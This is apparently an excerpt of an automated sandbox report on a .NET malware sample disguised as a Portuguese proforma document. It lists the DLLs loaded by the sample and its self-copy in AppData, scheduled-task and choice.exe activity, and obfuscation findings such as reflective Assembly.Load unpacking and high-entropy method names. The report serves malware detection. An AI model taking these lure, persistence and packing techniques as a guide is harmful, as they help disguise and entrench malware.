Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{41B89B6B-9399-11D2-9623-00C04F8EE628}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PROFORMA + PENDENTES.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PROFORMA + PENDENTES.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.cs	.Net Code: MClBM5h2k3 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.cs	.Net Code: MClBM5h2k3 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_025A4658 push edx; ret	0_2_025A465A
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_025A469B push edx; ret	0_2_025A469E
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_025A469F push edx; ret	0_2_025A46A2
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_025A475B push esi; ret	0_2_025A4762
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_025A4759 push esi; ret	0_2_025A475A
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_025A4790 push esi; ret	0_2_025A4792
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 0_2_025A5F08 push esp; ret	0_2_025A60E9
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Code function: 11_2_00FF24B9 push 8BFFFFFFh; retf	11_2_00FF24BF
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 12_2_05CF6E47 push eax; mov dword ptr [esp], edx	12_2_05CF6E5C
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013A24B9 push 8BFFFFFFh; retf	16_2_013A24BF
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Code function: 16_2_013A9692 push 00000066h; retf	16_2_013A9694

Source: PROFORMA + PENDENTES.exe	Static PE information: section name: .text entropy: 7.8959477360806245
Source: WYqxTmjfOgdZ.exe.0.dr	Static PE information: section name: .text entropy: 7.8959477360806245

Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, P9YhaUQTPWGmrkJYOM.cs	High entropy of concatenated method names: 'XIVp6ONf92cjxwcseuR', 'qoC1rfNeGjdpd8pKvlj', 'PGxaLkNxItsr69fUPsO', 'hD6b84ho97', 'NqDbE8YaP5', 'jAFbvfIW7F', 'YQSaXbNbxSDTfYZ4m4w', 'Qm8np7NyHuBI2beEffw'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, X8UiX2cvtnoE290aLy.cs	High entropy of concatenated method names: 'RHyl0mtZMt', 'zgFlP4G9OF', 'jQXldykwxZ', 'CMMloiqeV6', 'eHHlyMSkho', 'rRglLpIJvC', 'M2Qlpk5R6V', 'gj2ln5646D', 'uOplN2Y6Xn', 'imWlWgDR5k'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, OPHIWV1rONTdneeeKQ.cs	High entropy of concatenated method names: 'EuGV6Er0jb', 'REaVKLtjUw', 'jHxVbh2hT2', 'cYNb9QXQda', 'XLlbzbIToe', 'PlsVcGB1hk', 'oV5VjIaSbm', 'a6UVu7G666', 'qupVXrICXs', 'd1nVB4f1LA'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, LhTHsGF4RMAZGCa8kn.cs	High entropy of concatenated method names: 'FQnjVoQgwf', 'ltxjFCoTG0', 'H7yjfXKfBO', 'WaRjSZLE8e', 'K0DjldFJwK', 'C6fjA7va4P', 'VvV8Rud3PZC59uom7a', 'VPd6f1cXlKyQQJTTwa', 'KttjjPFT0d', 'vlYjXT8kOD'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, E9LtPwuKpQi6ZoWWhl.cs	High entropy of concatenated method names: 'wfYVi21BK4', 'uWYVsWu3Yg', 'jvRVMKAp96', 'oZjVxNKDhY', 'FAVVrXwCEu', 'yoAVYLJWlX', 'vbCVq3k0aP', 'F1PVGr39aY', 'i5xVTPIPI4', 'DlNVgg2fTg'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, BPtRuoLrWtp4vXFCxG.cs	High entropy of concatenated method names: 'Dispose', 'nZkjhY1GO0', 'EHruy2SgwE', 'uv45mmTDbZ', 'vA9j9EQ7C1', 'xuwjzt5Zyn', 'ProcessDialogKey', 'QU1ucmawwh', 't6XujIX2KD', 'homuutT4ts'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, Q5ojRjNNt049wiCCLRb.cs	High entropy of concatenated method names: 'Cgvv9ZWicw', 'EeAvzDPtNd', 'jr5Rc2TKpq', 'tZ8RjekCQ7', 'l1PRujXYFj', 'BjERXT4aP6', 'rNSRBnDrkT', 'FYjRCOLIjV', 'Yp7R6oD75u', 'wpZRe31uW0'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, oqyhYmNFX41kCRZNwVY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XmJ5EmQLI7', 'YTN5vdGShl', 'MnO5Ry4s4r', 'sCG55Zomaj', 'nyi5w67GGc', 'AY052DtqJS', 'aV95QPHSbB'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, QBD6LeWqfNbDZDo1Gy.cs	High entropy of concatenated method names: 'wiwvKVcg9c', 'xWQvJARZIy', 'pnPvbWDZAr', 'pa1vV9Gt4t', 'IV8vEqYCOk', 'xrJvFS5dai', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.cs	High entropy of concatenated method names: 'DL4XCGrFc2', 'FyrX6GnVT5', 'q2DXe7LTNV', 'WkHXKURASD', 'OXPXJ6OPI2', 'geVXbhn7x3', 'jqiXVZGnum', 'sl1XFbali2', 'SJDXahHKn4', 'Fe2XfGNhEv'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, IYGkQihKqcCcxHNjdZ.cs	High entropy of concatenated method names: 'ToString', 'MyRAUgvlob', 'nNJAyHk491', 'crUALZaJJ9', 'BgaApLO5Ay', 'FOVAn1n3Go', 'KguAN3cXZY', 'YoaAW8hJDe', 'XcpAHNWmY8', 'JGoA3mscTG'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, frWEPPZXcI6c8G7QYF.cs	High entropy of concatenated method names: 'QIMMwSIJX', 'Gg0x1JcmF', 'SlnYPgxAj', 'MkHqWFJf1', 'fSJTB8RFf', 'XBxgPAQsx', 'KVWBhZVwCb97fdle7g', 'lIQ5ij3OjSyYSBkHbu', 'Fqd8gkhdy', 'r5svhZkKt'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, v9ObnkTULXnVyWfjQA.cs	High entropy of concatenated method names: 'JJa4fxXhCk', 'eNo4SgrDmI', 'ToString', 'c6G46TjmZy', 'ceD4eN1UaD', 'zW64KfgV2l', 'AIR4JRH7bd', 'KVN4bDmbGI', 'YKK4V95clx', 'JHM4FteeUN'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, UXkvgCEsWpXnGZrTp9.cs	High entropy of concatenated method names: 'OVvbC6SvZS', 'oDVbeR2v0C', 'EEHbJOxKZI', 'KkabVk1kR4', 'jjAbFMhHx8', 'v3kJmBZxNr', 'fRJJk2i9oZ', 'nyLJIkUOA8', 'Mf7JtCj5TD', 'lN3Jh5AhQI'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, bpHb30nysGa21mKvTL.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n0PuhgmEo8', 'p4cu9e4d37', 'iHuuz3ERNt', 'XksXcH1dxB', 'RpGXjrJeFm', 'of3XuHyykB', 'Ea3XXxB5MF', 'VDggKGYF84Q68AYS8I6'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, zgBjQosOJogGKDUmJH.cs	High entropy of concatenated method names: 'uVjKxFNrQi', 'ThoKYAbV7S', 'xymKGdA9GE', 'XgmKTKU1Y0', 'FWJKln8yxQ', 'soiKAQTKJR', 'GbMK4RiOlT', 'EtMK880qDI', 'lP3KEIEAse', 'FTgKvyCTUE'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, iAdH3LXHdlUDhWWghq.cs	High entropy of concatenated method names: 'lq87GZttOD', 'VLD7T3gOGR', 'XEs7DSvsJ2', 'L9j7ym97aL', 'L0W7pdvPfu', 'I1Z7nT5UZh', 'dGU7WppYMO', 'gPd7HHPQWh', 'RQG703XAma', 'cVl7UYDGtA'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, ncXHr6HjWNrsHiQysJ.cs	High entropy of concatenated method names: 'iTyEDaiqHH', 'pR0Eyq0gTF', 'loGELJLEhc', 'zTLEpAMcbS', 'mJ4En8yYZX', 's95ENtxAm8', 'De9EWKJ921', 'uZ6EH5dk1K', 'LyTE3y9T0s', 'UpAE0Ey6uF'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, TmssbSfd3CWhJyrnTB.cs	High entropy of concatenated method names: 'QOjEl5yDtM', 'TA4E4v4T3r', 'IFgEEQho8E', 'JFDERKnkEX', 'ztYEw3IRV1', 'M2EEQf6hmW', 'Dispose', 'naJ86jBahl', 'h2o8eiXGmK', 'eSQ8KBCL4R'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, sh5n6iRcoyLbwQk1Ge.cs	High entropy of concatenated method names: 'kIIJr098Pi', 'o4WJqN9MCy', 'kjgKL7HdMZ', 'i5PKp0vwdn', 'jg0KnuZPgQ', 'zS9KNVrn4M', 'FoFKWqvnf0', 'kGPKHUJGhb', 'IAAK3Y2mAc', 'h1uK0XDoAx'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, R8pj7n9eaeWMWbYccx.cs	High entropy of concatenated method names: 'c1n4tp5xxn', 'jMW49ByLhn', 'Yws8csqOsA', 'T2e8jxBoea', 'sMI4UaprmD', 'BNQ4PZ5XoP', 'daS4ZMVt9J', 'HT04dvn7jO', 'Gpc4oncKRk', 'AtM41BSCq6'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, fChceiCHC87KuGpc8k.cs	High entropy of concatenated method names: 'FWcbQAdiDw', 'I4gbibEHV5', 'AKybMG6PDU', 'SRebxhnBte', 'IcgbYX2FcR', 'XEkbqjn0Jd', 'SmlbTAw23U', 'RV3bgl9Xlf', 'x1jfkVNDTFYBMLhCQPh', 'a39g0rNmD926so1NT3r'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, qnqHVqNKvdgemhNcIJx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HAZvUZlXT7', 'TE8vP593lF', 'giTvZrSafo', 'tC6vdKyndM', 'EbEvoffrtF', 'nQOv1NLlhc', 'cn0vOgh5Mr'
Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, uKGLrW3QqA3lP5biGX.cs	High entropy of concatenated method names: 'cvsedJodIT', 'VadeoPF5B4', 'O5Be1yL9a3', 'ukOeO5duR8', 'fVCemFDjPS', 'U7pekviT5c', 'iQaeIa4jVQ', 'px0et6QQ7E', 'iDFehiDlNC', 'KG6e9pehHD'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, P9YhaUQTPWGmrkJYOM.cs	High entropy of concatenated method names: 'XIVp6ONf92cjxwcseuR', 'qoC1rfNeGjdpd8pKvlj', 'PGxaLkNxItsr69fUPsO', 'hD6b84ho97', 'NqDbE8YaP5', 'jAFbvfIW7F', 'YQSaXbNbxSDTfYZ4m4w', 'Qm8np7NyHuBI2beEffw'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, X8UiX2cvtnoE290aLy.cs	High entropy of concatenated method names: 'RHyl0mtZMt', 'zgFlP4G9OF', 'jQXldykwxZ', 'CMMloiqeV6', 'eHHlyMSkho', 'rRglLpIJvC', 'M2Qlpk5R6V', 'gj2ln5646D', 'uOplN2Y6Xn', 'imWlWgDR5k'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, OPHIWV1rONTdneeeKQ.cs	High entropy of concatenated method names: 'EuGV6Er0jb', 'REaVKLtjUw', 'jHxVbh2hT2', 'cYNb9QXQda', 'XLlbzbIToe', 'PlsVcGB1hk', 'oV5VjIaSbm', 'a6UVu7G666', 'qupVXrICXs', 'd1nVB4f1LA'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, LhTHsGF4RMAZGCa8kn.cs	High entropy of concatenated method names: 'FQnjVoQgwf', 'ltxjFCoTG0', 'H7yjfXKfBO', 'WaRjSZLE8e', 'K0DjldFJwK', 'C6fjA7va4P', 'VvV8Rud3PZC59uom7a', 'VPd6f1cXlKyQQJTTwa', 'KttjjPFT0d', 'vlYjXT8kOD'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, E9LtPwuKpQi6ZoWWhl.cs	High entropy of concatenated method names: 'wfYVi21BK4', 'uWYVsWu3Yg', 'jvRVMKAp96', 'oZjVxNKDhY', 'FAVVrXwCEu', 'yoAVYLJWlX', 'vbCVq3k0aP', 'F1PVGr39aY', 'i5xVTPIPI4', 'DlNVgg2fTg'
Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, BPtRuoLrWtp4vXFCxG.cs	High entropy of concatenated method names: 'Dispose', 'nZkjhY1GO0', 'EHruy2SgwE', 'uv45mmTDbZ', 'vA9j9EQ7C1', 'xuwjzt5Zyn', 'ProcessDialogKey', 'QU1ucmawwh', 't6XujIX2KD', 'homuutT4ts'
